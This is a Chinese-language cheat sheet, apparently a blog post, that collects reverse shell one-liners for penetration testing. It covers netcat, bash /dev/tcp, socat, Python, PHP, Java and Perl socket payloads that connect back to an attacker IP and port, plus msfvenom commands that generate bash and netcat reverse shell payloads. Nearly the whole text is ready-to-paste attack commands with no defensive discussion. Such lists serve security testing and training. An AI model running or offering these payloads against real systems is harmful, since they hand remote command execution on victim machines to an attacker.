反弹shell命令总结
1.nc反弹
开启本地8080端口监听,并将本地的bash发布出去。
root# nc -lvvp 8080 -t -e /bin/bash
连接目标主机
nc ip 端口
2.bash直接反弹
kali监听
靶机运行:
root# bash -i >& /dev/tcp/ip/端口 0>&1
bash命令解析:
反弹成功
3. socat反弹
kali监听:socat tcp-listen:1234 -
靶机运行:
socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:IP:1234
反弹成功
4.脚本反弹
4.1:python反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4.2:php反弹
php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
4.3:java反弹
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/port;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
4.4:perl反弹
perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
5.msf获取反弹一句话
可以直接使用 msfvenom -l 结合关键字过滤(如cmd/unix/reverse),找出需要的各类反弹一句话payload的路径信息。
# msfvenom -l payloads 'cmd/unix/reverse'
发现msf支持反弹shell类型丰富。可以根据需求选择。
例如:生成bash的
# root@kali:~# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=6666 R
将生成的payload粘贴,在靶机运行即可。
生成netcat
msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R
将生成的payload粘贴,在靶机运行即可。
靶机运行payload:
成功反弹
2620
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
